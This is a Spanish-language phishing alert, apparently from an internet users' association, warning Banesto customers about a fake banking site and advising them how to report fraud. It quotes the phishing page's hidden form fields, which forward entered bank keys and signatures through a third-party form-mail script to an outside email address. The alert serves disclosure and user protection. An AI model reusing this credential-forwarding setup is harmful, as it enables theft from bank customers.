Se esta produciendo un nuevo phishing a la entidad bancaria Banesto. El phishing contiene un link que envia a la teórica victima a la siguiente web falsa; http://lutdeb.com:16080/img/mng/

El procedimiento es el la recepción de un correo electrónico con la siguiente excusa;
“hemos detectado recientemente que los accesos a su cuenta a través de Banca por Internet han sido realizados desde diferentes direcciones IP.”



Como se puede observar no facilitan una web para verificar nuestros datos, pero en realidad la url apunta a esta dirección; http://lutdeb.com:16080/img/mng/ que es una imitación a la web de Banesto.



Una vez facilitado los datos nos sale una pantalla agradeciendo el ingreso a la web, seguidamente nos envía a la web verdadera de la entidad bancaria Banesto.



Analizando el código de la web falsa nos encontramos con esto correos electrónicos donde posiblemente pueden ir las claves robadas;

http://www.gov.on.ca/cgi-bin/MBS/english/common/bnbform.cgi

!-- Finaliza tabla de contenidos --
input type="hidden" name="data_order"
value="tipodocumento,documento,codigousuario,clavepersonal,firma">
input type="hidden" name="submit_by"
value="root@govonca3.gov.on.ca"
input type="hidden" name="form_id"
value="ReForward"
input type="hidden" name="not_ok_url" value="http://lutdeb.com:16080/img/mng/index.php"
input type="hidden" name="ok_url"
value="http://lutdeb.com:16080/img/mng/VerificarActividad.php"
input type="hidden" name="required"
value="tipodocumento,documento,codigousuario,clavepersonal,firma"
input type="hidden" name="submit_to"
value="goldstar@cashette.com"

Recuerde; NO CONTESTE A ESTE TIPO DE CORREOS, su banco nunca le solicitara sus datos privados ya que ellos ya los tienen, en tal caso es usted el que lo puede solicitar por perdida, etc.


Aviso del Banesto;
Recuerde que Banesto nunca le solicitará sus claves de acceso mediante el envío de un e-mail ni por cualquier otro procedimiento. Sus claves son personales y sólo usted debería conocerlas. No acceda a Banesnet a través de "Links", hágalo siempre tecleando la dirección www.banesto.es

Consejos de seguridad del Banesto.


SeguridaPymes.es ofrece el indicador Alert-Phishing para sitios web.

Faq de ayuda sobre phishing;
http://seguridad.internautas.org/html/1/451.html
http://www.seguridadpymes.com/noticia.php?id=5


Le recordamos que la Asociación de Internautas cuenta con un servicio operativo desde hace meses para todos aquellos internautas que quieran reportar información sobre este tipo de fraudes realizados por medio de Phishing, con solo mandar un correo y adjuntar la información a; phishing@internautas.org

Se estudia el caso y se comunica a las fuerzas del estado para cursar la denuncia junto a un comunicado de aviso al banco afectado.

- CONSEJOS DE SEGURIDAD -

Normas de Seguridad para acceder a la banca por internet

Normas de Seguridad para una clave perfecta en Internet

Programa que te ayuda a Generar Claves Seguras.

Agradecemos a todos los amigos internautas que participan en la campaña Anti-Phising y denunciaron este tipo de fraudes.

SeguridaPymes.es ofrece el indicador Alert-Phishing para sitios web.